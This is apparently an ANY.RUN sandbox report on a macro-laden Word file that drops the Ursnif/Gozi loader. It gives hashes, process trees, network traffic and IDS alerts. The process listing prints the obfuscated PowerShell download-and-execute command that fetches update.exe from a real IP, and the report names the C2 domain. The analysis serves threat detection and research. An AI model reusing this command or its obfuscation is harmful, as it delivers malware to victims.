analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

b26c63b0abc0fee5b31bc57e3b31da6abc62c274e36c9c0b6edca9d2962ac9dd.doc

Full analysis: https://app.any.run/tasks/b552f556-bee7-4415-a4a3-11a5fbaa0caf
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: December 06, 2018, 17:29:01
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
trojan
loader
gozi
ursnif
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Windows, Template: Normal.dotm, Last Saved By: Windows, Revision Number: 4, Name of Creating Application: Microsoft Office Word, Total Editing Time: 11:00, Create Time/Date: Thu Dec 6 14:36:00 2018, Last Saved Time/Date: Thu Dec 6 14:50:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

FE8130EBC50054D1C66628AA1F54CCA6

SHA1:

FA3789FC7F5E2D61786318450ACE890C9CF79E3D

SHA256:

B26C63B0ABC0FEE5B31BC57E3B31DA6ABC62C274E36C9C0B6EDCA9D2962AC9DD

SSDEEP:

1536:tsyrGHgz2cBXs8+Nryl3H2Y1O2O1JHbGoIoF51c0xlun+2YGC:qyrBzBBXEMD1s1Jio5/cKunY

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2812)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2812)
    • Application was dropped or rewritten from another process

      • runn.exe (PID: 2952)
      • runn.exe (PID: 2128)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3988)
    • Downloads executable files from IP

      • powershell.exe (PID: 3988)
    • Loads dropped or rewritten executable

      • runn.exe (PID: 2952)
    • URSNIF was detected

      • iexplore.exe (PID: 1740)
    • Connects to CnC server

      • iexplore.exe (PID: 1740)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3988)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3988)
      • runn.exe (PID: 2952)
    • Creates files in the Windows directory

      • powershell.exe (PID: 3988)
    • Application launched itself

      • runn.exe (PID: 2952)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2812)
      • iexplore.exe (PID: 2744)
      • iexplore.exe (PID: 2356)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2812)
    • Application launched itself

      • iexplore.exe (PID: 1724)
      • chrome.exe (PID: 2576)
      • iexplore.exe (PID: 2356)
    • Changes internet zones settings

      • iexplore.exe (PID: 1724)
      • iexplore.exe (PID: 2356)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 1740)
      • iexplore.exe (PID: 2744)
    • Modifies the open verb of a shell class

      • chrome.exe (PID: 2576)
    • Changes settings of System certificates

      • chrome.exe (PID: 2576)
    • Reads internet explorer settings

      • iexplore.exe (PID: 1740)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (80)

EXIF

FlashPix

CompObjUserType: ???????? Microsoft Office Word 97-2003
CompObjUserTypeLen: 39
HeadingPairs:
  • Название
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 12
CharCountWithSpaces: 1
Paragraphs: 1
Lines: 1
Company: Microsoft
CodePage: Windows Cyrillic
Security: None
Characters: 1
Words: -
Pages: 1
ModifyDate: 2018:12:06 14:50:00
CreateDate: 2018:12:06 14:36:00
TotalEditTime: 11.0 minutes
Software: Microsoft Office Word
RevisionNumber: 4
LastModifiedBy: Пользователь Windows
Template: Normal.dotm
Keywords: -
Author: Пользователь Windows
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
50
Monitored processes
19
Malicious processes
3
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs powershell.exe runn.exe runn.exe chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs iexplore.exe #URSNIF iexplore.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs iexplore.exe iexplore.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2812"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\b26c63b0abc0fee5b31bc57e3b31da6abc62c274e36c9c0b6edca9d2962ac9dd.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3988powershell $path = 'cGObTrEdfdD:\winGObTrEdfdDdows\teGObTrEdfdDmp\runn.eGObTrEdfdDxe' -replace 'GObTrEdfdD', '';iex('$wc = new-obGObTrEdfdDject nGObTrEdfdDet.weGObTrEdfdDbclGObTrEdfdDient; $wc.dowGObTrEdfdDnloadfGObTrEdfdDile(\"hGObTrEdfdDttGObTrEdfdDp://185.183.96.9/update.exe\", $path)' -replace 'GObTrEdfdD', '');iex('stGObTrEdfdDart-prGObTrEdfdDocGObTrEdfdDess $path' -replace 'GObTrEdfdD', '');C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2952"C:\windows\temp\runn.exe" C:\windows\temp\runn.exe
powershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2128"C:\windows\temp\runn.exe" C:\windows\temp\runn.exe
runn.exe
User:
admin
Integrity Level:
MEDIUM
2576"C:\Program Files\Google\Chrome\Application\chrome.exe" C:\Program Files\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
68.0.3440.106
3328"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=68.0.3440.106 --initial-client-data=0x78,0x7c,0x80,0x74,0x84,0x6ebb00b0,0x6ebb00c0,0x6ebb00ccC:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
68.0.3440.106
2448"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2592 --on-initialized-event-handle=304 --parent-handle=308 /prefetch:6C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
68.0.3440.106
3496"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=928,4383664692595350063,9658117225574498643,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=971EF1AF0D6AF26F5498D869D918677A --mojo-platform-channel-handle=1012 --ignored=" --type=renderer " /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Version:
68.0.3440.106
4064"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=928,4383664692595350063,9658117225574498643,131072 --enable-features=PasswordImport --service-pipe-token=253D20265F477152908C3327FE34887F --lang=en-US --instant-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=253D20265F477152908C3327FE34887F --renderer-client-id=5 --mojo-platform-channel-handle=1900 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
2648"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=928,4383664692595350063,9658117225574498643,131072 --enable-features=PasswordImport --service-pipe-token=0670CFCB0F0285187BCCF5C3AFBB3D71 --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=0670CFCB0F0285187BCCF5C3AFBB3D71 --renderer-client-id=3 --mojo-platform-channel-handle=2072 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
Total events
2 526
Read events
1 918
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
45
Text files
63
Unknown types
7

Dropped files

PID
Process
Filename
Type
2812WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR96D7.tmp.cvr
MD5:
SHA256:
3988powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MN2Q6FFR2J8LBUQH6H1P.temp
MD5:
SHA256:
2576chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old
MD5:
SHA256:
2576chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\000016.dbtmp
MD5:
SHA256:
3988powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2812WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:97134130F5D402DEF1A4F4D6C8F007FA
SHA256:5CD87DA05B66B14EE81C18E40F0A083053B878A7F3D82D5CF3212B25AF266A26
2576chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\9a079b5c-2d50-438e-8000-fad78cccfb2c.tmp
MD5:
SHA256:
2576chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000016.dbtmp
MD5:
SHA256:
2952runn.exeC:\Users\admin\AppData\Local\Temp\298741557binary
MD5:348CE16F16D112072775A17321A02980
SHA256:CE94430D28C862F178B0693AFFF460638B6C8CE16A5C594E8BEFF944936741AC
2812WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$6c63b0abc0fee5b31bc57e3b31da6abc62c274e36c9c0b6edca9d2962ac9dd.docpgc
MD5:208534BE240F91CA380C4AFA99C557EB
SHA256:62E5222B33A0F3E1485FE58D8298CA68F16033C6038AF39C717AEBC7E1617180
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
49
DNS requests
36
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2356
iexplore.exe
GET
204.79.197.200:80
http://www.bing.com/favicon.ico
US
whitelisted
3988
powershell.exe
GET
200
185.183.96.9:80
http://185.183.96.9/update.exe
NL
executable
121 Kb
suspicious
1724
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
1740
iexplore.exe
GET
404
47.52.45.178:80
http://x1.eromov.at/wpx/Se8gsV0aLs/b07s40gaeC0RRw1jv/tQZ3oPAeMUDK/4gmGrw2q0W2/DQYLO9TTB45lO_/2FShOwGhGvtxaAsGf_2F8/69qa5KrZ52neqoYY/2_2BqJo4mCnsKYU/5fLzh_2FrOLGigc6pi/l669Dac2_/2BXa_2BRAJKhwJ4yVFXi/EMKvsLw14ZdjX6W9jJ0/OsvlYvAcdGnzmqWTJpr322/K3gfzsWrDI2dh0jjt/ZzA2J
HK
html
180 b
malicious
2576
chrome.exe
GET
200
93.184.220.29:80
http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt
US
der
1.15 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2576
chrome.exe
172.217.18.170:443
safebrowsing.googleapis.com
Google Inc.
US
whitelisted
2576
chrome.exe
172.217.18.163:443
www.google.de
Google Inc.
US
whitelisted
3988
powershell.exe
185.183.96.9:80
Host Sailor Ltd.
NL
suspicious
1724
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
2576
chrome.exe
172.217.16.3:443
clientservices.googleapis.com
Google Inc.
US
whitelisted
2576
chrome.exe
172.217.16.13:443
accounts.google.com
Google Inc.
US
unknown
1740
iexplore.exe
47.52.45.178:80
x1.eromov.at
Alibaba (China) Technology Co., Ltd.
HK
malicious
2576
chrome.exe
54.236.97.243:443
www.prudential.com
Amazon.com, Inc.
US
unknown
2576
chrome.exe
93.184.220.29:80
cacerts.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
2576
chrome.exe
63.32.116.169:443
nexus.ensighten.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
unknown

DNS requests

Domain
IP
Reputation
clientservices.googleapis.com
  • 172.217.16.3
whitelisted
www.gstatic.com
  • 172.217.16.3
whitelisted
safebrowsing.googleapis.com
  • 172.217.18.170
whitelisted
accounts.google.com
  • 172.217.16.13
shared
x1.eromov.at
  • 47.52.45.178
malicious
www.google.de
  • 172.217.18.163
whitelisted
www.bing.com
  • 204.79.197.200
whitelisted
www.google.com
  • 172.217.20.196
whitelisted
ssl.gstatic.com
  • 172.217.20.195
whitelisted
www.prudential.com
  • 54.236.97.243
unknown

Threats

PID
Process
Class
Message
3988
powershell.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
3988
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3988
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3988
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3988
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
1740
iexplore.exe
A Network Trojan was detected
SC SPYWARE Spyware Ursnif Win32
2 ETPRO signatures available at the full report
No debug info